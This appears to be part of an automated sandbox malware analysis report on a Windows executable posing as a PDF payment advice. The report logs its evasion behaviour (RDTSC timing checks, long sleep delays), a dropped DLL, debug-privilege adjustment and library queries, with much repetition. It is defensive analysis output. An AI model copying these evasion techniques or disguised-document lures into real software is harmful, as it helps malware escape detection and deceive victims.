              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeAPI/Special instruction interceptor: Address: 369B717
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeAPI/Special instruction interceptor: Address: 245B717
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeRDTSC instruction interceptor: First address: 365C687 second address: 365C687 instructions: 0x00000000 rdtsc 0x00000002 test al, bl 0x00000004 test dh, ch 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF2E871E966h 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeRDTSC instruction interceptor: First address: 241C687 second address: 241C687 instructions: 0x00000000 rdtsc 0x00000002 test al, bl 0x00000004 test dh, ch 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF2E8F227F6h 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeMemory allocated: 34790000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeMemory allocated: 345C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599436Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599217Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598999Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598659Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598530Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598296Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597421Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596655Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595999Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594568Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeWindow / User API: threadDelayed 1468Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeWindow / User API: threadDelayed 8384Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeAPI coverage: 2.7 %
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599874s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8016Thread sleep count: 1468 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8016Thread sleep count: 8384 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599436s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599217s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598999s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598659s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598530s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598296s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -598078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597421s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -597093s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596655s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595999s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595124s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -595015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -594906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -594796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -594687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe TID: 8012Thread sleep time: -594568s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599436Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599217Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598999Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598659Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598530Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598296Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597859Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597421Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597312Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596655Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595999Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeThread delayed: delay time: 594568Jump to behavior
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004038000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004097000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
